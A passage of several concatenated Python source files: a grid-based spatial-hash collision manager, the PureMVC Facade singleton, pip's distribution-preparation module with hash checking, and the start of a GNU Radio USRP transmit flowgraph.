The idea behind is to divide the space in rectangles with a given width and
height, and have a table telling which objects overlaps each rectangle.
Later, when the question 'which know objects has such and such spatial
relation with <some object>' arrives, only the objects in rectangles
overlaping <some object> (or nearby ones) needs to be examined for the
condition.
Look at CollisionManager for other class and methods documentation.
"""
def __init__(self, xmin, xmax, ymin, ymax, cell_width, cell_height):
"""
Cell width and height have impact on performance.
For objects with same with, and with width==height, a good value
is 1.25 * (object width).
For mixed widths, a good guess can be
~ 1.25 * { width(object): all objects not exceptionlly big}
:Parameters:
`xmin` : float
minimun x coordinate for a point in world
`xmax` : float
maximun x coordinate for a point in world
`ymin` : float
minimun y coordinate for a point in world
`ymax` : float
maximun y coordinate for a point in world
`cell_width` : float
width for the rectangles the space will be broken
`cell_height` : float
heigh for the rectangles the space will be broken
"""
self.xmin = xmin
self.xmax = xmax
self.ymin = ymin
self.ymax = ymax
self.cell_width = cell_width
self.cell_height = cell_height
cols = int(math.ceil((xmax - xmin)/float(cell_width)))
rows = int(math.ceil((ymax - ymin)/float(cell_height)))
self.cols = cols
self.rows = rows
numbuckets = cols*rows
# buckets maps cell identifier -> objs that potentially overlaps the cell
self.buckets = [set() for k in xrange(numbuckets)]
def add(self, obj):
# add to any bucket it overlaps
# for the collision logic algorithm is fine if a number of buckets
# that don't overlap are included; this allows to use a faster
# 'buckets_for_objects' at the cost of potentially some extra buckets
for cell_idx in self._iter_cells_for_aabb(obj.cshape.minmax()):
self.buckets[cell_idx].add(obj)
def remove_tricky(self, obj):
for cell_idx in self._iter_cells_for_aabb(obj.cshape.minmax()):
self.buckets[cell_idx].remove(obj)
def clear(self):
for bucket in self.buckets:
bucket.clear()
def they_collide(self, obj1, obj2):
return obj1.cshape.overlaps(obj2.cshape)
def objs_colliding(self, obj):
aabb = obj.cshape.minmax()
f_overlaps = obj.cshape.overlaps
collides = set()
collides.add(obj)
# do brute force with others in all the buckets obj overlaps
for cell_id in self._iter_cells_for_aabb(aabb):
for other in self.buckets[cell_id]:
if other not in collides and f_overlaps(other.cshape):
collides.add(other)
collides.remove(obj)
return collides
def iter_colliding(self, obj):
aabb = obj.cshape.minmax()
f_overlaps = obj.cshape.overlaps
collides = set()
collides.add(obj)
# do brute force with others in all the buckets obj overlaps
for cell_id in self._iter_cells_for_aabb(aabb):
for other in self.buckets[cell_id]:
if (other not in collides) and f_overlaps(other.cshape):
collides.add(other)
yield other
def any_near(self, obj, near_distance):
minx, maxx, miny, maxy = obj.cshape.minmax()
minx -= near_distance
maxx += near_distance
miny -= near_distance
maxy += near_distance
f_distance = obj.cshape.distance
# do brute force with others in all the buckets inflated shape overlaps
for cell_id in self._iter_cells_for_aabb((minx, maxx, miny, maxy)):
for other in self.buckets[cell_id]:
if other is not obj and f_distance(other.cshape) < near_distance:
return other
return None
def objs_near(self, obj, near_distance):
minx, maxx, miny, maxy = obj.cshape.minmax()
minx -= near_distance
maxx += near_distance
miny -= near_distance
maxy += near_distance
f_distance = obj.cshape.distance
collides = set()
# do brute force with others in all the buckets inflated shape overlaps
for cell_id in self._iter_cells_for_aabb((minx, maxx, miny, maxy)):
for other in self.buckets[cell_id]:
if (other not in collides and
(f_distance(other.cshape) < near_distance)):
collides.add(other)
collides.remove(obj)
return collides
def objs_near_wdistance(self, obj, near_distance):
minx, maxx, miny, maxy = obj.cshape.minmax()
minx -= near_distance
maxx += near_distance
miny -= near_distance
maxy += near_distance
f_distance = obj.cshape.distance
collides = {}
collides[obj] = 0.0
# do brute force with others in all the buckets inflated shape overlaps
for cell_id in self._iter_cells_for_aabb((minx, maxx, miny, maxy)):
for other in self.buckets[cell_id]:
if other not in collides:
d = f_distance(other.cshape)
if d <= near_distance:
collides[other] = d
#yield (other, d)
del collides[obj]
return [ (other, collides[other]) for other in collides ]
def ranked_objs_near(self, obj, near_distance):
tmp = self.objs_near_wdistance(obj, near_distance)
tmp.sort(key=op.itemgetter(1))
return tmp
def iter_all_collisions(self):
# implemented using the fact: 'a collides b' iff (there is a bucket B
# with a in B, b in B and 'a collides b')
known_collisions = set()
for bucket in self.buckets:
for i, obj in enumerate(bucket):
f_overlaps = obj.cshape.overlaps
for j, other in enumerate(bucket):
if j>=i:
break
if f_overlaps(other.cshape):
if id(obj)<id(other):
coll_id = (id(obj), id(other))
else:
coll_id = (id(other), id(obj))
if not coll_id in known_collisions:
known_collisions.add(coll_id)
yield (obj, other)
def knows(self, obj):
for bucket in self.buckets:
if obj in bucket:
return True
return False
def known_objs(self):
objs = set()
for bucket in self.buckets:
objs |= bucket
return objs
def objs_touching_point(self, x, y):
touching = set()
for cell_id in self._iter_cells_for_aabb((x, x, y, y)):
for obj in self.buckets[cell_id]:
if obj.cshape.touches_point(x, y):
touching.add(obj)
return touching
def objs_into_box(self, minx, maxx, miny, maxy):
into = set()
buckets = self.buckets
packed_box = (minx, maxx, miny, maxy)
for cell_idx in self._iter_cells_for_aabb(packed_box):
for obj in buckets[cell_idx]:
if (obj not in into) and (obj.cshape.fits_in_box(packed_box)):
into.add(obj)
return into
def _iter_cells_for_aabb(self, aabb):
# iterate all buckets overlapping the rectangle minmax
minx, maxx, miny, maxy = aabb
ix_lo = int(math.floor((minx - self.xmin)/self.cell_width))
ix_sup = int(math.ceil((maxx - self.xmin)/self.cell_width))
iy_lo = int(math.floor((miny - self.ymin)/self.cell_height))
iy_sup = int(math.ceil((maxy - self.ymin)/self.cell_height))
# but disregard cells ouside world, can come from near questions
if ix_lo < 0:
ix_lo = 0
if ix_sup > self.cols:
ix_sup = self.cols
if iy_lo < 0:
iy_lo = 0
if iy_sup > self.rows:
iy_sup = self.rows
for iy in xrange(iy_lo, iy_sup):
contrib_y = iy * self.cols
for ix in xrange(ix_lo, ix_sup):
cell_id = ix + contrib_y
yield cell_id
| |
"""
PureMVC Python Port by Toby de Havilland <toby.de.havilland@puremvc.org>
PureMVC - Copyright(c) 2006-08 Futurescale, Inc., Some rights reserved.
Your reuse is governed by the Creative Commons Attribution 3.0 License
"""
import puremvc.core
import puremvc.interfaces
import puremvc.patterns.observer
class Facade(object,puremvc.interfaces.IFacade):
"""
A base Singleton C{IFacade} implementation.
In PureMVC, the C{Facade} class assumes these
responsibilities:
Initializing the C{Model}, C{View} and C{Controller} Singletons.
Providing all the methods defined by the C{IModel, IView, & IController} interfaces.
Providing the ability to override the specific C{Model}, C{View} and C{Controller} Singletons created.
Providing a single point of contact to the application for registering C{Commands} and notifying C{Observers}
@see: L{Model<org.puremvc.as3.core.model.Model>}
@see: L{View<org.puremvc.as3.core.view.View>}
@see: L{Controller<org.puremvc.as3.core.controller.Controller>}
@see: L{Notification<org.puremvc.as3.patterns.observer.Notification>}
@see: L{Mediator<org.puremvc.as3.patterns.mediator.Mediator>}
@see: L{Proxy<org.puremvc.as3.patterns.proxy.Proxy>}
@see: L{SimpleCommand<org.puremvc.as3.patterns.command.SimpleCommand>}
@see: L{MacroCommand<org.puremvc.as3.patterns.command.MacroCommand>}
"""
instance = None
controller = None
model = None
view = None
def __new__(cls, *args, **kwargs):
"""
This C{IFacade} implementation is a Singleton, so you should not call the constructor
directly, but instead call the static Singleton method C{Facade.getInstance()}
"""
if not cls.instance or not isinstance(cls.instance, cls):
cls.instance = super(Facade, cls).__new__(cls, *args, **kwargs)
cls.instance.initializeFacade()
return cls.instance
@staticmethod
def getInstance():
"""
C{Facade} Singleton Static method.
@return: the Singleton instance of C{Facade}
"""
return Facade()
def initializeFacade(self):
"""
Initialize the Singleton C{Facade} instance.
Called automatically by the constructor. Override in your
subclass to do any subclass specific initializations. Be
sure to call C{Facade.initializeFacade()}, though.
"""
self.initializeController()
self.initializeModel()
self.initializeView()
def initializeController(self):
"""
Initialize the C{Controller}.
Called by the C{initializeFacade} method.
Override this method in your subclass of C{Facade}
if one or both of the following are true:
You wish to initialize a different C{IController}.
You have C{Commands} to register with the C{Controller} at startup.
If you don't want to initialize a different C{IController},
call C{super.initializeController()} at the beginning of your method, then register C{Proxy}s.
Note: This method is I{rarely} overridden; in practice you are more
likely to use a C{Command} to create and register C{Proxy}s
with the C{Model}, since C{Proxy}s with mutable data will likely
need to send C{INotification}s and thus will likely want to fetch a reference to
the C{Facade} during their construction.
"""
if (self.controller is not None):
return
self.controller = puremvc.core.Controller.getInstance()
def initializeModel(self):
"""
Initialize the C{Model}.
Called by the C{initializeFacade} method.
Override this method in your subclass of C{Facade}
if one or both of the following are true:
You wish to initialize a different C{IModel}.
You have C{Proxy}s to register with the Model that do not
retrieve a reference to the Facade at construction time.
If you don't want to initialize a different C{IModel},
call C{super.initializeModel()} at the beginning of your
method, then register C{Proxy}s.
Note: This method is I{rarely} overridden; in practice you are more
likely to use a C{Command} to create and register C{Proxy}s
with the C{Model}, since C{Proxy}s with mutable data will likely
need to send C{INotification}s and thus will likely want to fetch a reference to
the C{Facade} during their construction.
"""
if (self.model is not None):
return
self.model = puremvc.core.Model.getInstance()
def initializeView(self):
"""
Initialize the C{View}.
Called by the C{initializeFacade} method.
Override this method in your subclass of C{Facade}
if one or both of the following are true:
You wish to initialize a different C{IView}.
You have C{Observers} to register with the C{View}
If you don't want to initialize a different C{IView},
call C{super.initializeView()} at the beginning of your
method, then register C{IMediator} instances.
Note: This method is I{rarely} overridden; in practice you are more
likely to use a C{Command} to create and register C{Mediator}s
with the C{View}, since C{IMediator} instances will need to send
C{INotification}s and thus will likely want to fetch a reference
to the C{Facade} during their construction.
"""
if (self.view is not None):
return
self.view = puremvc.core.View.getInstance()
def registerCommand(self, notificationName, commandClassRef):
"""
Register an C{ICommand} with the C{Controller} by Notification name.
@param notificationName: the name of the C{INotification} to associate the C{ICommand} with
@param commandClassRef: a reference to the Class of the C{ICommand}
"""
self.controller.registerCommand(notificationName, commandClassRef)
def removeCommand(self, notificationName):
"""
Remove a previously registered C{ICommand} to C{INotification} mapping from the Controller.
@param notificationName: the name of the C{INotification} to remove the C{ICommand} mapping for
"""
self.controller.removeCommand(notificationName)
def hasCommand(self, notificationName):
"""
Check if a Command is registered for a given Notification
@param notificationName: the name of the C{INotification}
@return: whether a Command is currently registered for the given C{notificationName}.
"""
return self.controller.hasCommand(notificationName)
def registerProxy(self, proxy):
"""
Register an C{IProxy} with the C{Model} by name.
@param proxy: the C{IProxy} instance to be registered with the C{Model}.
"""
self.model.registerProxy(proxy)
def retrieveProxy(self, proxyName):
"""
Retrieve an C{IProxy} from the C{Model} by name.
@param proxyName: the name of the proxy to be retrieved.
@return: the C{IProxy} instance previously registered with the given C{proxyName}.
"""
return self.model.retrieveProxy(proxyName)
def removeProxy(self, proxyName):
"""
Remove an C{IProxy} from the C{Model} by name.
@param proxyName: the C{IProxy} to remove from the C{Model}.
@return: the C{IProxy} that was removed from the C{Model}
"""
proxy = None
if (self.model is not None):
proxy = self.model.removeProxy(proxyName)
return proxy
def hasProxy(self, proxyName):
"""
Check if a Proxy is registered
@param proxyName: the name of the C{IProxy}
@return: whether a Proxy is currently registered with the given C{proxyName}.
"""
return self.model.hasProxy(proxyName)
def registerMediator(self, mediator):
"""
Register a C{IMediator} with the C{View}.
@param mediator: a reference to the C{IMediator}
"""
if (self.view is not None):
self.view.registerMediator(mediator)
def retrieveMediator(self, mediatorName):
"""
Retrieve an C{IMediator} from the C{View}.
@param mediatorName: the name of the C{IMediator}
@return: the C{IMediator} previously registered with the given C{mediatorName}.
"""
return self.view.retrieveMediator(mediatorName)
def removeMediator(self, mediatorName):
"""
Remove an C{IMediator} from the C{View}.
@param mediatorName: name of the C{IMediator} to be removed.
@return: the C{IMediator} that was removed from the C{View}
"""
mediator = None
if (self.view is not None):
mediator = self.view.removeMediator(mediatorName)
return mediator
def hasMediator(self, mediatorName):
"""
Check if a Mediator is registered or not
@param mediatorName: the name of the C{IMediator}
@return: whether a Mediator is registered with the given C{mediatorName}.
"""
return self.view.hasMediator(mediatorName)
def sendNotification(self, notificationName, body=None, type=None):
"""
Create and send an C{INotification}.
Keeps us from having to construct new notification
instances in our implementation code.
@param notificationName: the name of the notiification to send
@param body: the body of the notification (optional)
@param type: the type of the notification (optional)
"""
self.notifyObservers(puremvc.patterns.observer.Notification(notificationName, body, type))
def notifyObservers(self, notification):
"""
Notify C{Observer}s.
This method is left public mostly for backward
compatibility, and to allow you to send custom
notification classes using the facade.
Usually you should just call sendNotification
and pass the parameters, never having to
construct the notification yourself.
@param notification: the C{INotification} to have the C{View} notify C{Observers} of.
"""
if (self.view is not None):
self.view.notifyObservers(notification)
| |
"""Prepares a distribution for installation
"""
# The following comment should be removed at some point in the future.
# mypy: strict-optional=False
import logging
import mimetypes
import os
import shutil
from typing import Dict, Iterable, List, Optional
from pip._vendor.packaging.utils import canonicalize_name
from pip._internal.distributions import make_distribution_for_install_requirement
from pip._internal.distributions.installed import InstalledDistribution
from pip._internal.exceptions import (
DirectoryUrlHashUnsupported,
HashMismatch,
HashUnpinned,
InstallationError,
NetworkConnectionError,
PreviousBuildDirError,
VcsHashUnsupported,
)
from pip._internal.index.package_finder import PackageFinder
from pip._internal.metadata import BaseDistribution
from pip._internal.models.link import Link
from pip._internal.models.wheel import Wheel
from pip._internal.network.download import BatchDownloader, Downloader
from pip._internal.network.lazy_wheel import (
HTTPRangeRequestUnsupported,
dist_from_wheel_url,
)
from pip._internal.network.session import PipSession
from pip._internal.req.req_install import InstallRequirement
from pip._internal.req.req_tracker import RequirementTracker
from pip._internal.utils.filesystem import copy2_fixed
from pip._internal.utils.hashes import Hashes, MissingHashes
from pip._internal.utils.logging import indent_log
from pip._internal.utils.misc import display_path, hide_url, is_installable_dir, rmtree
from pip._internal.utils.temp_dir import TempDirectory
from pip._internal.utils.unpacking import unpack_file
from pip._internal.vcs import vcs
logger = logging.getLogger(__name__)
def _get_prepared_distribution(
req: InstallRequirement,
req_tracker: RequirementTracker,
finder: PackageFinder,
build_isolation: bool,
) -> BaseDistribution:
"""Prepare a distribution for installation."""
abstract_dist = make_distribution_for_install_requirement(req)
with req_tracker.track(req):
abstract_dist.prepare_distribution_metadata(finder, build_isolation)
return abstract_dist.get_metadata_distribution()
def unpack_vcs_link(link: Link, location: str, verbosity: int) -> None:
vcs_backend = vcs.get_backend_for_scheme(link.scheme)
assert vcs_backend is not None
vcs_backend.unpack(location, url=hide_url(link.url), verbosity=verbosity)
class File:
def __init__(self, path: str, content_type: Optional[str]) -> None:
self.path = path
if content_type is None:
self.content_type = mimetypes.guess_type(path)[0]
else:
self.content_type = content_type
def get_http_url(
link: Link,
download: Downloader,
download_dir: Optional[str] = None,
hashes: Optional[Hashes] = None,
) -> File:
temp_dir = TempDirectory(kind="unpack", globally_managed=True)
# If a download dir is specified, is the file already downloaded there?
already_downloaded_path = None
if download_dir:
already_downloaded_path = _check_download_dir(link, download_dir, hashes)
if already_downloaded_path:
from_path = already_downloaded_path
content_type = None
else:
# let's download to a tmp dir
from_path, content_type = download(link, temp_dir.path)
if hashes:
hashes.check_against_path(from_path)
return File(from_path, content_type)
def _copy2_ignoring_special_files(src: str, dest: str) -> None:
"""Copying special files is not supported, but as a convenience to users
we skip errors copying them. This supports tools that may create e.g.
socket files in the project source directory.
"""
try:
copy2_fixed(src, dest)
except shutil.SpecialFileError as e:
# SpecialFileError may be raised due to either the source or
# destination. If the destination was the cause then we would actually
# care, but since the destination directory is deleted prior to
# copy we ignore all of them assuming it is caused by the source.
logger.warning(
"Ignoring special file error '%s' encountered copying %s to %s.",
str(e),
src,
dest,
)
def _copy_source_tree(source: str, target: str) -> None:
target_abspath = os.path.abspath(target)
target_basename = os.path.basename(target_abspath)
target_dirname = os.path.dirname(target_abspath)
def ignore(d: str, names: List[str]) -> List[str]:
skipped: List[str] = []
if d == source:
# Pulling in those directories can potentially be very slow,
# exclude the following directories if they appear in the top
# level dir (and only it).
# See discussion at https://github.com/pypa/pip/pull/6770
skipped += [".tox", ".nox"]
if os.path.abspath(d) == target_dirname:
# Prevent an infinite recursion if the target is in source.
# This can happen when TMPDIR is set to ${PWD}/...
# and we copy PWD to TMPDIR.
skipped += [target_basename]
return skipped
shutil.copytree(
source,
target,
ignore=ignore,
symlinks=True,
copy_function=_copy2_ignoring_special_files,
)
def get_file_url(
link: Link, download_dir: Optional[str] = None, hashes: Optional[Hashes] = None
) -> File:
"""Get file and optionally check its hash."""
# If a download dir is specified, is the file already there and valid?
already_downloaded_path = None
if download_dir:
already_downloaded_path = _check_download_dir(link, download_dir, hashes)
if already_downloaded_path:
from_path = already_downloaded_path
else:
from_path = link.file_path
# If --require-hashes is off, `hashes` is either empty, the
# link's embedded hash, or MissingHashes; it is required to
# match. If --require-hashes is on, we are satisfied by any
# hash in `hashes` matching: a URL-based or an option-based
# one; no internet-sourced hash will be in `hashes`.
if hashes:
hashes.check_against_path(from_path)
return File(from_path, None)
def unpack_url(
link: Link,
location: str,
download: Downloader,
verbosity: int,
download_dir: Optional[str] = None,
hashes: Optional[Hashes] = None,
) -> Optional[File]:
"""Unpack link into location, downloading if required.
:param hashes: A Hashes object, one of whose embedded hashes must match,
or HashMismatch will be raised. If the Hashes is empty, no matches are
required, and unhashable types of requirements (like VCS ones, which
would ordinarily raise HashUnsupported) are allowed.
"""
# non-editable vcs urls
if link.is_vcs:
unpack_vcs_link(link, location, verbosity=verbosity)
return None
# Once out-of-tree-builds are no longer supported, could potentially
# replace the below condition with `assert not link.is_existing_dir`
# - unpack_url does not need to be called for in-tree-builds.
#
# As further cleanup, _copy_source_tree and accompanying tests can
# be removed.
#
# TODO when use-deprecated=out-of-tree-build is removed
if link.is_existing_dir():
if os.path.isdir(location):
rmtree(location)
_copy_source_tree(link.file_path, location)
return None
# file urls
if link.is_file:
file = get_file_url(link, download_dir, hashes=hashes)
# http urls
else:
file = get_http_url(
link,
download,
download_dir,
hashes=hashes,
)
# unpack the archive to the build dir location. even when only downloading
# archives, they have to be unpacked to parse dependencies, except wheels
if not link.is_wheel:
unpack_file(file.path, location, file.content_type)
return file
def _check_download_dir(
link: Link, download_dir: str, hashes: Optional[Hashes]
) -> Optional[str]:
"""Check download_dir for previously downloaded file with correct hash
If a correct file is found return its path else None
"""
download_path = os.path.join(download_dir, link.filename)
if not os.path.exists(download_path):
return None
# If already downloaded, does its hash match?
logger.info("File was already downloaded %s", download_path)
if hashes:
try:
hashes.check_against_path(download_path)
except HashMismatch:
logger.warning(
"Previously-downloaded file %s has bad hash. Re-downloading.",
download_path,
)
os.unlink(download_path)
return None
return download_path
class RequirementPreparer:
"""Prepares a Requirement"""
def __init__(
self,
build_dir: str,
download_dir: Optional[str],
src_dir: str,
build_isolation: bool,
req_tracker: RequirementTracker,
session: PipSession,
progress_bar: str,
finder: PackageFinder,
require_hashes: bool,
use_user_site: bool,
lazy_wheel: bool,
verbosity: int,
in_tree_build: bool,
) -> None:
super().__init__()
self.src_dir = src_dir
self.build_dir = build_dir
self.req_tracker = req_tracker
self._session = session
self._download = Downloader(session, progress_bar)
self._batch_download = BatchDownloader(session, progress_bar)
self.finder = finder
# Where still-packed archives should be written to. If None, they are
# not saved, and are deleted immediately after unpacking.
self.download_dir = download_dir
# Is build isolation allowed?
self.build_isolation = build_isolation
# Should hash-checking be required?
self.require_hashes = require_hashes
# Should install in user site-packages?
self.use_user_site = use_user_site
# Should wheels be downloaded lazily?
self.use_lazy_wheel = lazy_wheel
# How verbose should underlying tooling be?
self.verbosity = verbosity
# Should in-tree builds be used for local paths?
self.in_tree_build = in_tree_build
# Memoized downloaded files, as mapping of url: path.
self._downloaded: Dict[str, str] = {}
# Previous "header" printed for a link-based InstallRequirement
self._previous_requirement_header = ("", "")
def _log_preparing_link(self, req: InstallRequirement) -> None:
"""Provide context for the requirement being prepared."""
if req.link.is_file and not req.original_link_is_in_wheel_cache:
message = "Processing %s"
information = str(display_path(req.link.file_path))
else:
message = "Collecting %s"
information = str(req.req or req)
if (message, information) != self._previous_requirement_header:
self._previous_requirement_header = (message, information)
logger.info(message, information)
if req.original_link_is_in_wheel_cache:
with indent_log():
logger.info("Using cached %s", req.link.filename)
def _ensure_link_req_src_dir(
self, req: InstallRequirement, parallel_builds: bool
) -> None:
"""Ensure source_dir of a linked InstallRequirement."""
# Since source_dir is only set for editable requirements.
if req.link.is_wheel:
# We don't need to unpack wheels, so no need for a source
# directory.
return
assert req.source_dir is None
if req.link.is_existing_dir() and self.in_tree_build:
# build local directories in-tree
req.source_dir = req.link.file_path
return
# We always delete unpacked sdists after pip runs.
req.ensure_has_source_dir(
self.build_dir,
autodelete=True,
parallel_builds=parallel_builds,
)
# If a checkout exists, it's unwise to keep going. version
# inconsistencies are logged later, but do not fail the
# installation.
# FIXME: this won't upgrade when there's an existing
# package unpacked in `req.source_dir`
# TODO: this check is now probably dead code
if is_installable_dir(req.source_dir):
raise PreviousBuildDirError(
"pip can't proceed with requirements '{}' due to a"
"pre-existing build directory ({}). This is likely "
"due to a previous installation that failed . pip is "
"being responsible and not assuming it can delete this. "
"Please delete it and try again.".format(req, req.source_dir)
)
def _get_linked_req_hashes(self, req: InstallRequirement) -> Hashes:
# By the time this is called, the requirement's link should have
# been checked so we can tell what kind of requirements req is
# and raise some more informative errors than otherwise.
# (For example, we can raise VcsHashUnsupported for a VCS URL
# rather than HashMissing.)
if not self.require_hashes:
return req.hashes(trust_internet=True)
# We could check these first 2 conditions inside unpack_url
# and save repetition of conditions, but then we would
# report less-useful error messages for unhashable
# requirements, complaining that there's no hash provided.
if req.link.is_vcs:
raise VcsHashUnsupported()
if req.link.is_existing_dir():
raise DirectoryUrlHashUnsupported()
# Unpinned packages are asking for trouble when a new version
# is uploaded. This isn't a security check, but it saves users
# a surprising hash mismatch in the future.
# file:/// URLs aren't pinnable, so don't complain about them
# not being pinned.
if req.original_link is None and not req.is_pinned:
raise HashUnpinned()
# If known-good hashes are missing for this requirement,
# shim it with a facade object that will provoke hash
# computation and then raise a HashMissing exception
# showing the user what the hash should be.
return req.hashes(trust_internet=False) or MissingHashes()
def _fetch_metadata_using_lazy_wheel(
self,
link: Link,
) -> Optional[BaseDistribution]:
"""Fetch metadata using lazy wheel, if possible."""
if not self.use_lazy_wheel:
return None
if self.require_hashes:
logger.debug("Lazy wheel is not used as hash checking is required")
return None
if link.is_file or not link.is_wheel:
logger.debug(
"Lazy wheel is not used as %r does not points to a remote wheel",
link,
)
return None
wheel = Wheel(link.filename)
name = canonicalize_name(wheel.name)
logger.info(
"Obtaining dependency information from %s %s",
name,
wheel.version,
)
url = link.url.split("#", 1)[0]
try:
return dist_from_wheel_url(name, url, self._session)
except HTTPRangeRequestUnsupported:
logger.debug("%s does not support range requests", url)
return None
def _complete_partial_requirements(
self,
partially_downloaded_reqs: Iterable[InstallRequirement],
parallel_builds: bool = False,
) -> None:
"""Download any requirements which were only fetched by metadata."""
# Download to a temporary directory. These will be copied over as
# needed for downstream 'download', 'wheel', and 'install' commands.
temp_dir = TempDirectory(kind="unpack", globally_managed=True).path
# Map each link to the requirement that owns it. This allows us to set
# `req.local_file_path` on the appropriate requirement after passing
# all the links at once into BatchDownloader.
links_to_fully_download: Dict[Link, InstallRequirement] = {}
for req in partially_downloaded_reqs:
assert req.link
links_to_fully_download[req.link] = req
batch_download = self._batch_download(
links_to_fully_download.keys(),
temp_dir,
)
for link, (filepath, _) in batch_download:
logger.debug("Downloading link %s to %s", link, filepath)
req = links_to_fully_download[link]
req.local_file_path = filepath
# This step is necessary to ensure all lazy wheels are processed
# successfully by the 'download', 'wheel', and 'install' commands.
for req in partially_downloaded_reqs:
self._prepare_linked_requirement(req, parallel_builds)
def prepare_linked_requirement(
self, req: InstallRequirement, parallel_builds: bool = False
) -> BaseDistribution:
"""Prepare a requirement to be obtained from req.link."""
assert req.link
link = req.link
self._log_preparing_link(req)
with indent_log():
# Check if the relevant file is already available
# in the download directory
file_path = None
if self.download_dir is not None and link.is_wheel:
hashes = self._get_linked_req_hashes(req)
file_path = _check_download_dir(req.link, self.download_dir, hashes)
if file_path is not None:
# The file is already available, so mark it as downloaded
self._downloaded[req.link.url] = file_path
else:
# The file is not available, attempt to fetch only metadata
wheel_dist = self._fetch_metadata_using_lazy_wheel(link)
if wheel_dist is not None:
req.needs_more_preparation = True
return wheel_dist
# None of the optimizations worked, fully prepare the requirement
return self._prepare_linked_requirement(req, parallel_builds)
def prepare_linked_requirements_more(
self, reqs: Iterable[InstallRequirement], parallel_builds: bool = False
) -> None:
"""Prepare linked requirements more, if needed."""
reqs = [req for req in reqs if req.needs_more_preparation]
for req in reqs:
# Determine if any of these requirements were already downloaded.
if self.download_dir is not None and req.link.is_wheel:
hashes = self._get_linked_req_hashes(req)
file_path = _check_download_dir(req.link, self.download_dir, hashes)
if file_path is not None:
self._downloaded[req.link.url] = file_path
req.needs_more_preparation = False
# Prepare requirements we found were already downloaded for some
# reason. The other downloads will be completed separately.
partially_downloaded_reqs: List[InstallRequirement] = []
for req in reqs:
if req.needs_more_preparation:
partially_downloaded_reqs.append(req)
else:
self._prepare_linked_requirement(req, parallel_builds)
# TODO: separate this part out from RequirementPreparer when the v1
# resolver can be removed!
self._complete_partial_requirements(
partially_downloaded_reqs,
parallel_builds=parallel_builds,
)
def _prepare_linked_requirement(
self, req: InstallRequirement, parallel_builds: bool
) -> BaseDistribution:
assert req.link
link = req.link
self._ensure_link_req_src_dir(req, parallel_builds)
hashes = self._get_linked_req_hashes(req)
if link.is_existing_dir() and self.in_tree_build:
local_file = None
elif link.url not in self._downloaded:
try:
local_file = unpack_url(
link,
req.source_dir,
self._download,
self.verbosity,
self.download_dir,
hashes,
)
except NetworkConnectionError as exc:
raise InstallationError(
"Could not install requirement {} because of HTTP "
"error {} for URL {}".format(req, exc, link)
)
else:
file_path = self._downloaded[link.url]
if hashes:
hashes.check_against_path(file_path)
local_file = File(file_path, content_type=None)
# For use in later processing,
# preserve the file path on the requirement.
if local_file:
req.local_file_path = local_file.path
dist = _get_prepared_distribution(
req,
self.req_tracker,
self.finder,
self.build_isolation,
)
return dist
def save_linked_requirement(self, req: InstallRequirement) -> None:
assert self.download_dir is not None
assert req.link is not None
link = req.link
if link.is_vcs or (link.is_existing_dir() and req.editable):
# Make a .zip of the source_dir we already created.
req.archive(self.download_dir)
return
if link.is_existing_dir():
logger.debug(
"Not copying link to destination directory "
"since it is a directory: %s",
link,
)
return
if req.local_file_path is None:
# No distribution was downloaded for this requirement.
return
download_location = os.path.join(self.download_dir, link.filename)
if not os.path.exists(download_location):
shutil.copy(req.local_file_path, download_location)
download_path = display_path(download_location)
logger.info("Saved %s", download_path)
def prepare_editable_requirement(
self,
req: InstallRequirement,
) -> BaseDistribution:
"""Prepare an editable requirement."""
assert req.editable, "cannot prepare a non-editable req as editable"
logger.info("Obtaining %s", req)
with indent_log():
if self.require_hashes:
raise InstallationError(
"The editable requirement {} cannot be installed when "
"requiring hashes, because there is no single file to "
"hash.".format(req)
)
req.ensure_has_source_dir(self.src_dir)
req.update_editable()
dist = _get_prepared_distribution(
req,
self.req_tracker,
self.finder,
self.build_isolation,
)
req.check_if_exists(self.use_user_site)
return dist
def prepare_installed_requirement(
self,
req: InstallRequirement,
skip_reason: str,
) -> BaseDistribution:
"""Prepare an already-installed requirement."""
assert req.satisfied_by, "req should have been satisfied but isn't"
assert skip_reason is not None, (
"did not get skip reason skipped but req.satisfied_by "
"is set to {}".format(req.satisfied_by)
)
logger.info(
"Requirement %s: %s (%s)", skip_reason, req, req.satisfied_by.version
)
with indent_log():
if self.require_hashes:
logger.debug(
"Since it is already installed, we are trusting this "
"package without checking its hash. To ensure a "
"completely repeatable environment, install into an "
"empty virtualenv."
)
return InstalledDistribution(req).get_metadata_distribution()
| |
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
##################################################
# GNU Radio Python Flow Graph
# Title: Tx Scram Sock
# Generated: Wed May 24 01:08:49 2017
##################################################
from gnuradio import blocks
from gnuradio import digital
from gnuradio import eng_notation
from gnuradio import gr
from gnuradio import uhd
from gnuradio.eng_option import eng_option
from gnuradio.filter import firdes
from optparse import OptionParser
import numpy
import time
import vtgs
class tx_scram_sock(gr.top_block):
def __init__(self, addr='0.0.0.0', alpha=0.5, bb_gain=.5, port='52001', samp_rate=500e3, samps_per_symb=4, tx_correct=0, tx_freq=2395e6, tx_gain=20, tx_offset=50e3):
gr.top_block.__init__(self, "Tx Scram Sock")
##################################################
# Parameters
##################################################
self.addr = addr
self.alpha = alpha
self.bb_gain = bb_gain
self.port = port
self.samp_rate = samp_rate
self.samps_per_symb = samps_per_symb
self.tx_correct = tx_correct
self.tx_freq = tx_freq
self.tx_gain = tx_gain
self.tx_offset = tx_offset
##################################################
# Blocks
##################################################
self.vtgs_mult_scrambler_0 = vtgs.mult_scrambler(17, 0x3FFFF)
self.vtgs_ao40_encoder_0 = vtgs.ao40_encoder(False, 449838109)
self.uhd_usrp_sink_0 = uhd.usrp_sink(
",".join(("", "")),
uhd.stream_args(
cpu_format="fc32",
channels=range(1),
),
)
self.uhd_usrp_sink_0.set_time_source('gpsdo', 0)
self.uhd_usrp_sink_0.set_samp_rate(samp_rate)
self.uhd_usrp_sink_0.set_center_freq(uhd.tune_request(tx_freq+tx_correct, tx_offset), 0)
self.uhd_usrp_sink_0.set_gain(tx_gain, 0)
self.uhd_usrp_sink_0.set_antenna('TX/RX', 0)
self.digital_map_bb_0 = digital.map_bb((1,0))
self.digital_dxpsk_mod_0 = digital.dbpsk_mod(
samples_per_symbol=samps_per_symb,
excess_bw=alpha,
mod_code="gray",
verbose=False,
log=False)
self.blocks_stream_mux_0 = blocks.stream_mux(gr.sizeof_char*1, (768,5232))
self.blocks_socket_pdu_0 = blocks.socket_pdu("UDP_SERVER", addr, port, 256, False)
self.blocks_pack_k_bits_bb_0 = blocks.pack_k_bits_bb(8)
